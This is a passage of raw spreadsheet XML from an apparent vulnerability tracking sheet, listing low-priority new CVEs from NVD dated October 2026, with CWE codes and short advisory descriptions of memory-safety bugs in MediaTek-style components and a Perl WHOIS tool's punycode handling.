          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13607</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19954</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="inlineStr"/>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-176</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Net::Whois::Raw versions before 2.99044 for Perl ship a pwhois command-line tool that queries WHOIS for the wrong domain for unicode domain names.
pwhois encodes each non-ASCII label directly using Net::IDN::Punycode and prepends xn--. Apart from lowercasing ASCII and Cyrillic letters, it skips the IDNA mapping and normalization steps, so a label with other uppercase letters, or not in NFC, encodes to a different A-label than its IDNA form. For example, a label of U+00C9 followed by "cole" encodes to "xn--cole-pka" rather than "xn--cole-9oa".
The Net::Whois::Raw library modules are not affected.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19954</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20519</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="inlineStr"/>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S92"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not needed for exploitation. Patch ID: MOLY01778993; Issue ID: MSV-8898.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20519</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20520</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="inlineStr"/>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S93"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not needed for exploitation. Patch ID: MOLY01778988; Issue ID: MSV-8897.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20520</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20521</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="inlineStr"/>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>In Video HAL, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11375674; Issue ID: MSV-9571.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20521</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20522</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="inlineStr"/>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>In neuropilot, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249050; Issue ID: MSV-9172.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20522</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20523</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="inlineStr"/>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>In neuropilot, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249062; Issue ID: MSV-9171.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20523</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20524</t>
        </is>
      </c>
      <c r="D97" s="5" t="inlineStr"/>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="inlineStr"/>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-1285</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249004; Issue ID: MSV-9170.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20524</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20525</t>
        </is>
      </c>
      <c r="D98" s="5" t="inlineStr"/>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="inlineStr"/>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01870473 / MOLY00814393; Issue ID: MSV-9041.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20525</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20526</t>
        </is>
      </c>
      <c r="D99" s="5" t="inlineStr"/>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="inlineStr"/>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01898195; Issue ID: MSV-8906.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20526</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20527</t>
        </is>
      </c>
      <c r="D100" s="5" t="inlineStr"/>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01864925 / MOLY01210562; Issue ID: MSV-8303.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20527</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20528</t>
        </is>
      </c>
      <c r="D101" s="5" t="inlineStr"/>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="inlineStr"/>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In ccci, there is a possible out of bounds write and read due to a missing bounds check. This could lead to local information disclosure, memory corruption, crashes, or privilege escalation if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS11428950 (Note: For MT6880, MT6890) / ALPS10563453 (Note: For MT6980D, MT6990, MT6986, MT6986D, MT6813, MT6988) / AUTO00858766 (Note: For MT2735, MT2737); Issue ID: MSV-9893.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20528</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20529</t>
        </is>
      </c>
      <c r="D102" s="5" t="inlineStr"/>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="inlineStr"/>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11276677; Issue ID: MSV-9217.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20529</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20530</t>
        </is>
      </c>
      <c r="D103" s="5" t="inlineStr"/>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="inlineStr"/>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11292777; Issue ID: MSV-9195.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20530</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20531</t>
        </is>
      </c>
      <c r="D104" s="5" t="inlineStr"/>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="inlineStr"/>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249016; Issue ID: MSV-9169.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20531</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20532</t>
        </is>
      </c>
      <c r="D105" s="5" t="inlineStr"/>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="inlineStr"/>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible application crash due to double free. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249024; Issue ID: MSV-9168.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20532</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20533</t>
        </is>
      </c>
      <c r="D106" s="5" t="inlineStr"/>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="inlineStr"/>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In display, there is a possible escalation of privilege due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11296678; Issue ID: MSV-9167.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20533</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20534</t>
        </is>
      </c>
      <c r="D107" s="5" t="inlineStr"/>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="inlineStr"/>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01797547; Issue ID: MSV-9155.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20534</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20535</t>
        </is>
      </c>
      <c r="D108" s="5" t="inlineStr"/>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="inlineStr"/>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
